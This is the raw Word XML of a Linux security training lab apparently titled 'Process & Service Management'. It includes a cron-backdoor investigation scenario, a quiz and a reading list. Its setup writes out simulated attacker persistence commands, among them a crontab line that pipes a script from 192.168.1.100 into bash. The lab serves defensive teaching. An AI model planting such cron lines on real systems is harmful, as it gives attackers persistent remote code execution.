                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Situation: An analyst suspects that a compromised account on this system has been used to install a cron-based backdoor. Investigate all scheduled tasks on the system and identify the malicious entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup (run as root to simulate attacker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Simulate an attacker's persistence cron job</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">echo '*/10 * * * * curl -s http://192.168.1.100/update.sh | bash' | crontab -u www-data -</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Simulate a system-level cron backdoor</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">echo '0 3 * * * root /tmp/.hidden_script.sh' &gt;&gt; /etc/cron.d/system-update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigation Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all user crontabs using the loop command from the Key Concepts section — identify the malicious www-data entry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check all files in /etc/cron.d/ and identify the suspicious system-update entry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the indicators of compromise in each malicious cron job (remote execution, unusual times, hidden paths)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove both malicious cron entries and verify they are gone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Find any files in /tmp that were created as part of the simulated attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write an incident finding for each cron entry: what it does, why it is suspicious, and what action was taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment &amp; Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge Check Quiz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple Choice &amp; Short Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the difference between SIGTERM and SIGKILL? When would you use each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A process shows STAT 'Z' in ps output. What does this mean, and is it a security concern?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the difference between systemctl enable and systemctl start?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You find a .service file in /etc/systemd/system/ that you don't recognize. What steps would you take to investigate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a cron entry that runs /opt/scripts/backup.sh every day at 11:30 PM as root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During an incident investigation, which directories and files would you check for attacker-planted cron jobs? List at least five locations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Students must submit the following for evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal output (screenshots or copy-paste) demonstrating completion of all three lab scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The service hardening report from Scenario 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The two incident findings from Scenario 3, written in professional security documentation format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A completed process investigation table: PID, PPID, user, command, CPU%, suspicion reason, and action taken for each suspicious process found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional Resources &amp; Reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Linux Command Line by William Shotts – Chapters on processes and job control (free at linuxcommand.org)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Basics for Hackers by OccupyTheWeb – Process management from an offensive security perspective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Linux Works by Brian Ward – In-depth coverage of processes, systemd, and the boot process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Online Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd Documentation – https://systemd.io and man systemctl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron HowTo (Ubuntu) – https://help.ubuntu.com/community/CronHowto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SANS Hunt Evil poster – Process and network baseline reference for threat hunting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Process Forensics – https://www.sans.org/reading-room/whitepapers/incident/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice Environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe: Linux Fundamentals Part 3 – Process management exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Linux machines – Apply process investigation skills in realistic scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OverTheWire: Bandit – Levels involving job control and process manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">MindGigs Cybersecurity Training  •  Module 10: Process &amp; Service Management  •  Phase 2 of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2026-04-30T22:29:09.834Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T22:29:09.834Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>